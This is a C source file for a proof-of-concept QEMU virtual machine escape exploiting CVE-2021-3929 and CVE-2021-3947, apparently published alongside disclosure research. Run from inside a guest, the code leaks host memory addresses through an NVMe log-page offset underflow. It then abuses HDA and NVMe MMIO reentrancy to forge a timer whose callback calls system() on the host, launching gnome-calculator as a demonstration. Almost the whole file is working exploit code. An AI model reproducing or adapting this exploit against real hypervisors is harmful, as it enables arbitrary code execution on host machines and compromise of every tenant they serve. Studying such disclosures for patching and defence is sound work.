/* * VM escape PoC for CVE-2021-3929 and CVE-2021-3947 * https://github.com/QiuhaoLi/CVE-2021-3929-3947 */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "qemu.h" #include "helpers.h" #define PAGE_SIZE (1 << 12) #define NVME_MMIO_PHYS_BASE_ADDRESS (volatile void *)(0xf4094000) /* hard-coded! */ #define NVME_MMIO_LENGTH (16 * 1024) #define HDA_ICH9_MMIO_PHYS_BASE_ADDRESS (volatile void *)(0xf4098000) /* hard-coded! */ #define HDA_ICH9_MMIO_LENGTH (16 * 1024) #define ELF_SYSTEM_PLT_OFFSET (0x3D2C24) /* hard-coded! */ const char *command = "/usr/bin/gnome-calculator"; struct mmio_region { volatile void *guest_phys_address; volatile void *guest_virt_address; size_t size; }; struct mmio_region nvme_mmio_region = {.guest_phys_address = NVME_MMIO_PHYS_BASE_ADDRESS, .size = NVME_MMIO_LENGTH}; struct mmio_region hda_mmio_region = {.guest_phys_address = HDA_ICH9_MMIO_PHYS_BASE_ADDRESS, .size = HDA_ICH9_MMIO_LENGTH}; void mmio_write_w_fn(struct mmio_region region, off_t offset, uint16_t data) { volatile uint16_t *p = region.guest_virt_address + offset; *p = data; } void mmio_write_l_fn(struct mmio_region region, off_t offset, uint32_t data) { volatile uint32_t *p = region.guest_virt_address + offset; *p = data; } void nvme_reset_submit_commands(void *cqes_phys_addr, void *cmds_phys_addr, uint32_t tail) { mmio_write_l_fn(nvme_mmio_region, NVME_OFFSET_ACQ, (uint32_t)(uint64_t)cqes_phys_addr); /* cq dma_addr */ mmio_write_l_fn(nvme_mmio_region, NVME_OFFSET_ACQ + 4, (uint32_t)((uint64_t)cqes_phys_addr >> 32)); mmio_write_l_fn(nvme_mmio_region, NVME_OFFSET_ASQ, (uint32_t)(uint64_t)cmds_phys_addr); /* sq dma_addr */ mmio_write_l_fn(nvme_mmio_region, NVME_OFFSET_ASQ + 4, (uint32_t)((uint64_t)cmds_phys_addr >> 32)); mmio_write_l_fn(nvme_mmio_region, NVME_OFFSET_AQA, 0x200020); /* nvme_init_cq nvme_init_sq size = 32 + 1 */ mmio_write_l_fn(nvme_mmio_region, NVME_OFFSET_CC, (uint32_t)0); /* reset nvme, nvme_ctrl_reset() */ mmio_write_l_fn(nvme_mmio_region, NVME_OFFSET_CC, (uint32_t)((4 << 20) + (6 << 16) + 1)); /* start nvme, nvme_start_ctrl() */ mmio_write_l_fn(nvme_mmio_region, NVME_OFFSET_SQyTDBL, tail); /* set tail for commands */ } uint64_t leak_elf(void) { /* *(uint64_t *)(((uint8_t *)nslist) + 0x1730) - 0x40 */ #define LEAK_ELF_OFF (0x1730) /* hard-coded! */ #define LEAK_ELF_VAL_OFF (-0x40) /* hard-coded! */ uint64_t *leak_buf = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0); mlock(leak_buf, PAGE_SIZE); memset(leak_buf, 0, PAGE_SIZE); void *leak_buf_phys_addr = virt_to_phys(leak_buf); NvmeCqe *cqes = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0); mlock(cqes, PAGE_SIZE); memset(cqes, 0, PAGE_SIZE); void *cqes_phys_addr = virt_to_phys(cqes); NvmeCmd *cmds = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0); mlock(cmds, PAGE_SIZE); memset(cmds, 0, PAGE_SIZE); void *cmds_phys_addr = virt_to_phys(cmds); cmds[0].opcode = 2; /* cmd->opcode, NVME_ADM_CMD_GET_LOG_PAGE, nvme_get_log() */ cmds[0].dptr.prp1 = (uint64_t)leak_buf_phys_addr; /* prp1, leak_buf */ cmds[0].cdw10 = 4 + (0x1 << 16); /* buf_len = (0x1+1) << 2 = 8, lid = 4 NVME_LOG_CHANGED_NSLIST, nvme_changed_nslist() */ uint64_t off = LEAK_ELF_OFF; /* underflow */ cmds[0].cdw12 = (uint32_t)off; cmds[0].cdw13 = (uint32_t)(off >> 32); nvme_reset_submit_commands(cqes_phys_addr, cmds_phys_addr, 1); volatile uint64_t *vals = leak_buf; /* wait to fresh the leak_buf */ sleep(1); return vals[0] + LEAK_ELF_VAL_OFF; } uint64_t leak_ram(uint64_t host_nslist_address) { /* ram_mask *(uint64_t *)((uint8_t *)nslist + 0x1020) 0x00007fd3a84e1310 & 0xffffffff00000000 */ /* heap_base *(uint64_t *)((uint8_t *)nslist + 0x11b0) 0x556fb9549788, size ~ 40 pages */ #define LEAK_RAM_MASK_OFF (0x1020) /* hard-coded! */ #define LEAK_RAM_HEAP_OFF (0x11b0) /* hard-coded! */ #define LEAK_RAM_MASK_START (0xffffffff00000000) #define LEAK_RAM_MASK_ENDING (0xe00000) /* hard-coded! */ #define LEAK_RAM_SEARCH_PAGES_NUM (16) #define LEAK_RAM_MATCH(ram_mask) uint64_t *leak_buf = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0); mlock(leak_buf, PAGE_SIZE); memset(leak_buf, 0, PAGE_SIZE); void *leak_buf_phys_addr = virt_to_phys(leak_buf); NvmeCqe *cqes = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0); mlock(cqes, PAGE_SIZE); memset(cqes, 0, PAGE_SIZE); void *cqes_phys_addr = virt_to_phys(cqes); NvmeCmd *cmds = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0); mlock(cmds, PAGE_SIZE); memset(cmds, 0, PAGE_SIZE); void *cmds_phys_addr = virt_to_phys(cmds); cmds[0].opcode = 2; /* cmd->opcode, NVME_ADM_CMD_GET_LOG_PAGE, nvme_get_log() */ cmds[0].dptr.prp1 = (uint64_t)leak_buf_phys_addr; /* prp1, leak_buf */ cmds[0].cdw10 = 4 + (0x1 << 16); /* buf_len = (0x1+1) << 2 = 8, lid = 4 NVME_LOG_CHANGED_NSLIST, nvme_changed_nslist() */ uint64_t off = LEAK_RAM_MASK_OFF; /* underflow */ cmds[0].cdw12 = (uint32_t)off; cmds[0].cdw13 = (uint32_t)(off >> 32); nvme_reset_submit_commands(cqes_phys_addr, cmds_phys_addr, 1); volatile uint64_t *vals = leak_buf; /* wait to fresh the leak_buf */ sleep(1); uint64_t ram_mask = (vals[0] & LEAK_RAM_MASK_START) + LEAK_RAM_MASK_ENDING; fprintf(stderr, "ram_mask = 0x%lx\n", ram_mask); fflush(stderr); // getchar(); off = LEAK_RAM_HEAP_OFF; /* underflow */ cmds[0].cdw12 = (uint32_t)off; cmds[0].cdw13 = (uint32_t)(off >> 32); nvme_reset_submit_commands(cqes_phys_addr, cmds_phys_addr, 1); /* wait to fresh the leak_buf */ sleep(1); uint64_t heap_search_base = vals[0]; void *leak_heap_buf = get_continuous_phys_pages(LEAK_RAM_SEARCH_PAGES_NUM); /* get 16 pages from the main heap */ void *leak_heap_buf_phys_addr = virt_to_phys((const void *)leak_heap_buf); cmds[0].cdw10 = 4 + ((((LEAK_RAM_SEARCH_PAGES_NUM * PAGE_SIZE) >> 2) - 1) << 16); /* buf_len = PAGE_SIZE * LEAK_RAM_SEARCH_PAGES_NUM, lid = 4 NVME_LOG_CHANGED_NSLIST, nvme_changed_nslist() */ off = heap_search_base - host_nslist_address; /* underflow */ cmds[0].cdw12 = (uint32_t)off; cmds[0].cdw13 = (uint32_t)(off >> 32); cmds[0].dptr.prp1 = (uint64_t)leak_heap_buf_phys_addr; /* prp1, first page */ uint64_t *prp_list = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0); mlock(prp_list, PAGE_SIZE); memset(prp_list, 0, PAGE_SIZE); void *prp_list_phys_addr = virt_to_phys(prp_list); for (size_t i = 0; i < (LEAK_RAM_SEARCH_PAGES_NUM - 1); i++) { prp_list[i] = (uint64_t)leak_heap_buf_phys_addr + (i + 1) * PAGE_SIZE; } cmds[0].dptr.prp2 = (uint64_t)prp_list_phys_addr; /* prp2, prp_list */ nvme_reset_submit_commands(cqes_phys_addr, cmds_phys_addr, 1); sleep(1); // uint64_t tmp = *(uint64_t *)(leak_heap_buf + 0x4250); // return tmp; /* search for the main heap address */ for (size_t i = 0; i <= 16 * PAGE_SIZE; i++) { uint64_t tmp = *(uint64_t *)(leak_heap_buf + i); if (((tmp & ram_mask) == ram_mask) && ((tmp & 0x1fffff) /* 0xe00000 */ == 0) && ((tmp & ~0x00007fffffffffff) == 0)) { return tmp; } } fprintf(stderr, "failed to leak the ram address\n"); fflush(stderr); exit(EXIT_FAILURE); } uint64_t leak_nslist(void) { /* *(uint64_t *)((void *)&nslist + 0x1010) - 0x10a0 */ #define LEAK_NSLIST_OFF (0x1010) /* hard-coded! */ #define LEAK_NSLIST_VAL_OFF (-0x10a0) /* hard-coded! */ uint64_t *leak_buf = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0); mlock(leak_buf, PAGE_SIZE); memset(leak_buf, 0, PAGE_SIZE); void *leak_buf_phys_addr = virt_to_phys(leak_buf); NvmeCqe *cqes = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0); mlock(cqes, PAGE_SIZE); memset(cqes, 0, PAGE_SIZE); void *cqes_phys_addr = virt_to_phys(cqes); NvmeCmd *cmds = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0); mlock(cmds, PAGE_SIZE); memset(cmds, 0, PAGE_SIZE); void *cmds_phys_addr = virt_to_phys(cmds); cmds[0].opcode = 2; /* cmd->opcode, NVME_ADM_CMD_GET_LOG_PAGE, nvme_get_log() */ cmds[0].dptr.prp1 = (uint64_t)leak_buf_phys_addr; /* prp1, leak_buf */ cmds[0].cdw10 = 4 + (0x1 << 16); /* buf_len = (0x1+1) << 2 = 8, lid = 4 NVME_LOG_CHANGED_NSLIST, nvme_changed_nslist() */ uint64_t off = LEAK_NSLIST_OFF; /* underflow */ cmds[0].cdw12 = (uint32_t)off; cmds[0].cdw13 = (uint32_t)(off >> 32); nvme_reset_submit_commands(cqes_phys_addr, cmds_phys_addr, 1); volatile uint64_t *vals = leak_buf; /* wait to fresh the leak_buf */ sleep(1); return vals[0] + LEAK_NSLIST_VAL_OFF; } /* Construct fake timer and timerlist */ uint64_t construct_timer(uint64_t host_guest_ram_address) { QEMUTimer *cq_timer_buf = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0); mlock(cq_timer_buf, PAGE_SIZE); memset(cq_timer_buf, 0, PAGE_SIZE); void *cq_timer_buf_phys_addr = virt_to_phys(cq_timer_buf); QEMUTimerList *cq_timerlist_buf = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0); mlock(cq_timerlist_buf, PAGE_SIZE); memset(cq_timerlist_buf, 0, PAGE_SIZE); void *cq_timerlist_buf_phys_addr = virt_to_phys(cq_timerlist_buf); uint64_t cq_timerlist_buf_ram_offset = (uint64_t)cq_timerlist_buf_phys_addr; /* will be - 0x100000000 + 0x80000000 with bigger RAM */ uint64_t host_guest_cq_timerlist_buf_address = host_guest_ram_address + cq_timerlist_buf_ram_offset; cq_timer_buf->timer_list = (QEMUTimerList *)host_guest_cq_timerlist_buf_address; cq_timerlist_buf->active_timers_lock.initialized = true; cq_timerlist_buf->active_timers = (QEMUTimer *)NULL; uint64_t elf_base_address = leak_elf(); fprintf(stderr, "elf base address = 0x%lx\n", elf_base_address); fprintf(stderr, "system@plt = 0x%lx\n", elf_base_address + ELF_SYSTEM_PLT_OFFSET); fflush(stderr); // getchar() cq_timerlist_buf->notify_cb = (QEMUTimerListNotifyCB *)(elf_base_address + ELF_SYSTEM_PLT_OFFSET); void *command_guest_phys_address = virt_to_phys(command); uint64_t command_guest_ram_offset = (uint64_t)command_guest_phys_address; cq_timerlist_buf->notify_opaque = (void *)(command_guest_ram_offset + host_guest_ram_address); cq_timerlist_buf->clock = (QEMUClock *)((uint8_t *)host_guest_cq_timerlist_buf_address + PAGE_SIZE / 2); /* clock->type, second parameter, all zeros */ return (uint64_t)cq_timer_buf_phys_addr; } int main(int argc, const char *argv[]) { nvme_mmio_region.guest_virt_address = dev_mmio_map(nvme_mmio_region.guest_phys_address, nvme_mmio_region.size); hda_mmio_region.guest_virt_address = dev_mmio_map(hda_mmio_region.guest_phys_address, hda_mmio_region.size); uint8_t *mmio_buf = get_continuous_phys_pages(3); /* MMIO writes content, 1. HDA 2. NVMe 3. HDA */ void *mmio_buf_phys_addr = virt_to_phys(mmio_buf); uint64_t mmio_buf_ram_offset = (uint64_t)mmio_buf_phys_addr; /* will be - 0x100000000 + 0x80000000 with bigger RAM */ uint64_t host_nslist_address = leak_nslist(); fprintf(stderr, "host_nslist_address = 0x%lx\n", host_nslist_address); fflush(stderr); // getchar(); uint64_t host_guest_ram_address = leak_ram(host_nslist_address); fprintf(stderr, "host_guest_ram_address = 0x%lx\n", host_guest_ram_address); fflush(stderr); // getchar(); uint64_t host_guest_mmio_buf_address = host_guest_ram_address + mmio_buf_ram_offset; uint8_t *buf1_hda = mmio_buf; *(uint32_t *)(buf1_hda + HDA_OFFSET_ICH6_REG_GCTL) = 0x1; /* 0x8 ICH6_REG_GCTL, avoid reset */ *(uint32_t *)(buf1_hda + HDA_OFFSET_IN0_LVI) = 0x2; /* Don't break INO_LVI which will be used later */ uint64_t cq_timer_buf_phys_addr = construct_timer(host_guest_ram_address); /* fake timer */ *(uint32_t *)(buf1_hda + HDA_OFFSET_IN0_BDLPL) = (uint32_t)cq_timer_buf_phys_addr; *(uint32_t *)(buf1_hda + HDA_OFFSET_IN0_BDLPU) = (uint32_t)(cq_timer_buf_phys_addr >> 32); *(uint32_t *)(buf1_hda + HDA_OFFSET_IN1_CTL) = 0x2; /* 0x80 IN1 CTL, malloc cq->timer (0x30) */ *(uint32_t *)(buf1_hda + HDA_OFFSET_IN2_CTL) = 0x2; /* 0x80 IN2 CTL, malloc cq->timer (0x30) */ *(uint32_t *)(buf1_hda + HDA_OFFSET_IN3_CTL) = 0x2; /* 0x80 IN3 CTL, malloc cq->timer (0x30) */ uint8_t *buf2_nvme = mmio_buf + PAGE_SIZE; /* nvme reset, NVME_OFFSET_CC = 0 */ uint8_t *buf3_hda = mmio_buf + 2 * PAGE_SIZE; *(uint32_t *)(buf3_hda + HDA_OFFSET_ICH6_REG_GCTL) = 0x1; /* 0x8 ICH6_REG_GCTL, avoid reset */ *(uint32_t *)(buf3_hda + HDA_OFFSET_IN0_CTL) = 0x2; /* 0x80 IN0 CTL, malloc cq->timer (0x30) */ NvmeCqe *cqes = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0); /* 32 * sizeof(NvmeCqe) */ mlock(cqes, PAGE_SIZE); memset(cqes, 0, PAGE_SIZE); void *cqes_phys_addr = virt_to_phys(cqes); NvmeCmd *cmds = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0); /* 32 * sizeof(NvmeCmd) */ mlock(cmds, PAGE_SIZE); memset(cmds, 0, PAGE_SIZE); void *cmds_phys_addr = virt_to_phys(cmds); /* cmds[0-30] are all zero, in case assert(cq->cqid == req->sq->cqid) fails after freed */ cmds[31].opcode = 2; /* cmd->opcode, NVME_ADM_CMD_GET_LOG_PAGE, nvme_get_log() */ cmds[31].flags = 0; /* SGLs shall not be used for Admin commands in NVMe over PCIe, NVME_PSDT_PRP, nvme_map_prp() */ cmds[31].cdw10 = 4 + (0xbff << 16); /* buf_len = (0xbff+1) << 2 = 3 * PAGE_SIZE, lid = 4 NVME_LOG_CHANGED_NSLIST, nvme_changed_nslist() */ uint64_t off = host_guest_mmio_buf_address - host_nslist_address; /* underflow */ cmds[31].cdw12 = (uint32_t)off; cmds[31].cdw13 = (uint32_t)(off >> 32); cmds[31].dptr.prp1 = (uint64_t)hda_mmio_region.guest_phys_address; /* prp1, 1. HDA MMIO */ void *prp_list = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0); mlock(prp_list, PAGE_SIZE); memset(prp_list, 0, PAGE_SIZE); void *prp_list_phys_addr = virt_to_phys(prp_list); uint64_t *prp_list_entry1 = prp_list + PAGE_SIZE - 2 * sizeof(uint64_t); uint64_t *prp_list_entry2 = prp_list + PAGE_SIZE - 1 * sizeof(uint64_t); *prp_list_entry1 = (uint64_t)nvme_mmio_region.guest_phys_address; /* 2. NVMe MMIO */ *prp_list_entry2 = (uint64_t)hda_mmio_region.guest_phys_address; /* 3. HDA MMIO */ cmds[31].dptr.prp2 = (uint64_t)prp_list_phys_addr + PAGE_SIZE - 2 * sizeof(uint64_t); /* prp2, prp_list */ /* wait for fprintf() above */ sleep(1); mmio_write_w_fn(hda_mmio_region, HDA_OFFSET_IN0_LVI, 0x2); /* st[0].lvi = 2, malloc(0x30) */ mmio_write_w_fn(hda_mmio_region, HDA_OFFSET_IN1_LVI, 0x2); /* st[1].lvi = 2, malloc(0x30) */ mmio_write_w_fn(hda_mmio_region, HDA_OFFSET_IN2_LVI, 0x2); /* st[2].lvi = 2, malloc(0x30) */ mmio_write_w_fn(hda_mmio_region, HDA_OFFSET_IN3_LVI, 0x2); /* st[3].lvi = 2, malloc(0x30) */ nvme_reset_submit_commands(cqes_phys_addr, cmds_phys_addr, 32); return 0; }